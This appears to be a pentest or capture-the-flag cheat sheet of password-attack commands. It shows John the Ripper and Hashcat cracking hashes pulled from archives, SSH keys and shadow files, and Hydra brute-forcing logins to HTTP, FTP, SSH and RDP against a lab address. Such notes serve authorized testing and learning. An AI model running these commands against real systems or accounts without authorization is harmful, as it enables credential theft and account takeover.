Cracking

John the Ripper

Base Use:

john --wordlist=rockyou.txt hash.txt

Zip File

zip2john file1.zip>hash.txt

Rar file

rar2john file1.rar > hash.txt

gpg password

gpg2john file1.priv > hash.txt

Shadow file

unshadow passwd shadow

john --wordlist=rockyou.txt --format=sha512crypt unshadowed.txt

SSH key password

ssh2john id_rsa > hash.txt

NTLM Cracking

john --wordlist=rockyou.txt hash.txt --format=NT

PDF password

pdf2john file.pdf > hash.txt

Hashcat

• Hashcat often auto-guesses, or will tell you

• Manually test here: https://hashcat.net/wiki/doku.php?id=example_hashes
• Basic use:

hashcat -m 0 7d98afcbd8a6c5b8c2dfb07bcbe29d34 /root/rockyou.txt --force

Hydra

HTTP Basic Auth

hydra -l admin -P dict/rockyou.txt http://10.10.10.10/ [-s 443] http[s]-get /private/

HTTP Post Form

hydra -l admin -P dict/rockyou.txt 10.10.10.10 [-s 443] http[s]-post-form Hash/Password Crack post-form "/login.php:username=admin&password=^PASS^&login=Login:F=Incorrect username or password" -V

FTP

hydra -t 1 -l admin -P dict/rockyou.txt -vV 10.10.10.10 ftp

SSH

hydra -l user -P dict/rockyou.txt ssh://10.10.10.10:22 -t 4

RDP

hydra -t 1 -V -f -l administrator -P dict/rockyou.txt rdp://10.10.10.10